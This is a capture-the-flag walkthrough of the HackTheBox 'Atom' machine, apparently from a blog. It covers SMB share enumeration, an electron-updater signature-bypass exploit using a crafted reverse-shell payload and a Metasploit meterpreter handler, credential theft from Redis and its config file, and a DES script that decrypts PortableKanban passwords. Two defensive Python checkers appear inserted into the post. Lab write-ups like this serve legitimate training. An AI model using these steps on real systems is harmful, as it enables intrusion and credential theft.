In this post, I would like to share a walkthrough of the Atom machine.
This room is rated as a Medium difficulty machine.
Information Gathering on Atom machine
Once we have started the VPN connection, we can begin information gathering on the machine by executing the command nmap -sC -sV <IP Address> -Pn
Let's look at the website interface.
There is nothing of interest on the website interface.
Based on the nmap result, I notice that port 445 is open, which is normally used for the SMB service.
For those who are not familiar with the SMB service, you can read about it here.
We can list the shares on the SMB service by running smbclient -L //10.10.10.237/ and we notice that Software_Updates is one of the share names.
Let's enumerate the Software_Updates share further by executing the command smbclient //10.10.10.237/Software_Updates -U " "
For this activity, no password is needed to proceed further.
We have folders client1, client2 and client3 along with a PDF file named UAT_Testing_Procedures.pdf.
We can investigate the PDF file by downloading it to our machine with get UAT_Testing_Procedures.pdf.
Gaining the Access on Atom machine
There is no file stored in any of the folders client1, client2 and client3.
Before we put the latest.yml file into one of the folders, we need to read the PDF file shown below.
Why do we need to put latest.yml on the machine? Because, according to the PDF above, the application is built with electron-builder. I have done some research on the internet.
The exploit is explained in the Doyensec blog post "Signature Validation Bypass Leading to RCE In Electron-Updater".
From my understanding of the PDF file, we need to do the steps shown below:
Firstly, we need to create a crafted payload that will give us a reverse shell connection back to our machine.
We get the hash of the crafted file by using sha512sum filename
# Reminder: We need to get a new sha512sum whenever we recreate the crafted file #
We will be using CyberChef to convert it from hex to base64, as shown above.
Maintaining the Access on Atom machine
Next, we need to use Metasploit to catch the reverse shell. We start it with the msfconsole command and then run:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST <VPN's IP address>
set LPORT <PORT that you use on msfvenom exploit>
run
We will move on to the next step of the activity by creating the latest.yml file.
The file will look something like the screenshot above. We need to add the sha512 value as encoded on the CyberChef website here, and save everything as latest.yml.
We need to start our Python server in the directory where we saved latest.yml.
It will take a few seconds, depending on our machine.
We managed to get a meterpreter session when we look back at the Metasploit terminal.
I should be able to get a shell on the machine by executing the shell -i command.
We can read the user flag by typing the command "type C:\Users\jason\Desktop\user.txt"
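To make the sha512 and latest.yml steps above concrete from the verifier's side, here is an added Python example (not from the original post, and not electron-builder's own code). It computes the base64-encoded SHA-512 that an updater compares against the sha512 field of latest.yml, converts a sha512sum hex digest into that form, and accepts or rejects an artifact accordingly. The sample artifact and manifest are constructed, and the minimal flat-key parser and the field names it reads are assumptions.

```python
import base64
import hashlib
import re

# Constructed sample artifact standing in for an update binary.
SAMPLE_ARTIFACT = b"constructed-sample-update-binary-contents\n"


def sha512_base64(data: bytes) -> str:
    """Base64 of the raw SHA-512 digest: the form written into the sha512
    field of latest.yml (sha512sum prints the hex form instead)."""
    return base64.b64encode(hashlib.sha512(data).digest()).decode("ascii")


def hex_digest_to_base64(hex_digest: str) -> str:
    """Convert a sha512sum-style hex digest to the base64 form latest.yml uses
    (the same hex-to-base64 conversion the walkthrough does in CyberChef)."""
    return base64.b64encode(bytes.fromhex(hex_digest.strip())).decode("ascii")


def parse_manifest(text: str) -> dict:
    """Read the flat top-level `key: value` lines of a latest.yml.
    Assumption: a minimal parser is enough; nested `files:` entries are skipped."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z0-9_]+):\s*(\S.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def build_manifest(version: str, path: str, artifact: bytes) -> str:
    """Constructed latest.yml carrying only the fields this check needs."""
    return (
        f"version: {version}\n"
        f"path: {path}\n"
        f"sha512: {sha512_base64(artifact)}\n"
    )


def verify_update(manifest_text: str, artifact: bytes) -> bool:
    """Return True only if the artifact's SHA-512 matches the manifest.

    A match proves the artifact is the one the manifest describes; it says
    nothing about who wrote the manifest. The manifest must therefore come
    from a source the updater authenticates, and the binary's code signature
    must still be checked, or anyone able to write to the update share can
    publish a manifest for a file of their choosing."""
    fields = parse_manifest(manifest_text)
    expected = fields.get("sha512")
    if not expected:
        return False  # no integrity value at all: reject
    return expected == sha512_base64(artifact)


if __name__ == "__main__":
    manifest = build_manifest("1.0.1", "update-1.0.1.exe", SAMPLE_ARTIFACT)
    print(manifest)
    print("genuine artifact accepted:", verify_update(manifest, SAMPLE_ARTIFACT))
    print("modified artifact accepted:", verify_update(manifest, SAMPLE_ARTIFACT + b"x"))
```

The check passes for the artifact the manifest was written for and fails for a modified one, which is the whole of what the hash guarantees. The writeable Software_Updates share is the weak point: the integrity value travels with the manifest, so the defence is to authenticate the manifest source and enforce code-signature verification on the binary rather than to trust the share.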
Escalate to Root Privileges Access on Atom machine
We could find the privilege escalation vector with winPEAS, but I will find it manually.
Based on my experience, there should be a suspicious file stored in C:\Program Files\, and we managed to find a Redis folder.
When we look carefully at the Redis folder, we notice that redis.windows-service.conf and redis.windows.conf stand out compared to the other files here.
We can read the conf file by using the command "type redis.windows-service.conf" and we have obtained a password: kidvscat_yes_kidvscat
Based on my research on the Redis tools, we found some information like below:
Now, we should install redis-tools on our Kali Linux machine by executing the command apt-get install redis-tools
It will take a while to complete
We need to execute the commands below to get the hash:
redis-cli -h 10.10.10.237 -a kidvscat_yes_kidvscat
keys *
get pk:urn:user:e8e29158-d70d-44b1-a1ba-494d52790a0
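The Redis part of this privilege escalation rests on two configuration weaknesses: a credential stored in plaintext in a file a low-privileged user can read, and a service reachable from outside the host. As an added example (not from the original post, and not a Redis project tool), here is a small Python audit that parses a redis.conf-style file and reports both conditions. The sample configurations are constructed to mirror the layout of redis.windows-service.conf, the password in them is a placeholder, and the directive-parsing rules are assumptions.

```python
# Constructed sample modelled on redis.windows-service.conf; the password is a placeholder.
WEAK_CONF = """\
# Redis configuration file example
bind 0.0.0.0
port 6379
protected-mode no
requirepass EXAMPLE_PLACEHOLDER_PASSWORD
dir ./
"""

# Constructed hardened counterpart: loopback only, protected mode left on,
# and no shared secret written into a world-readable file.
HARDENED_CONF = """\
bind 127.0.0.1
port 6379
protected-mode yes
dir ./
"""

ALL_INTERFACES = {"0.0.0.0", "*", "::"}


def parse_redis_conf(text: str) -> dict:
    """Return the effective directives as {name: value}.
    Assumptions: comments and blank lines are skipped, directive names are
    case-insensitive, and a repeated directive's last occurrence wins."""
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        name = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        directives[name] = value
    return directives


def audit_redis_conf(text: str) -> list:
    """Report the settings that let the walkthrough's scenario happen."""
    findings = []
    d = parse_redis_conf(text)
    if d.get("requirepass"):
        findings.append("requirepass: credential stored in plaintext; restrict the file's ACL to the service account")
    if d.get("protected-mode", "yes").lower() == "no":
        findings.append("protected-mode no: non-loopback clients are not refused")
    bind = d.get("bind", "")
    # With no bind directive Redis listens on every interface.
    if not bind or any(addr in ALL_INTERFACES for addr in bind.split()):
        findings.append("bind: listens on all interfaces; bind to 127.0.0.1 unless remote access is required")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{label}]")
        for finding in audit_redis_conf(conf) or ["no findings"]:
            print("  -", finding)
```

A plaintext requirepass on its own is only a local exposure; it becomes a remote one exactly when the service also listens on all interfaces, which is the combination the redis-cli session above depends on. Keeping the data directory and the application's stored secrets out of the reach of a low-privileged account closes the next link in the chain as well.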
Now we have the hash and need to decrypt it to proceed to the next step. However, we don't know how to decrypt it yet.
We found a PDF file named User Guide.pdf located at C:\Users\jason\Download\PortableKanban
Honestly, I have never used PortableKanban in my life, so we need to do some research on it.
What we should be getting is the Python script shown in the first result above (link here). An example of the script can be seen below.
I stumbled upon an error with this Python script because we don't have PortableKanban.pk3 on our Kali Linux OS. Let's modify the code to meet our requirements for the machine.
It will look something like the below:
import base64
from des import DesKey  # python3 -m pip install des

# Key and IV are the ones from the PortableKanban script found during the research above.
try:
    token = input("Enter the Hash : ")
    ciphertext = base64.b64decode(token.encode('utf-8'))
    key = DesKey(b"7ly6UznJ")
    print("Decrypted Password : " + key.decrypt(ciphertext, initial=b"XuVUm5fR", padding=True).decode('utf-8'))
except Exception:
    print("Wrong Hash")
For the script to work, you need to install des by executing pip3 install des
Once we have installed des, it works well. We just need to key in the hash that we found earlier to get the decrypted password.
We need to run evil-winrm to get the root flag; the command is ruby evil-winrm -i 10.10.10.237 -u 'administrator' -p 'kidvscat_admin_@123'
Once we gain the shell, we can read the root flag in the C:\Users\Administrator\Desktop directory. Finally, we read it by using the command "type root.txt"
-THE END-
Happy Learning Guys!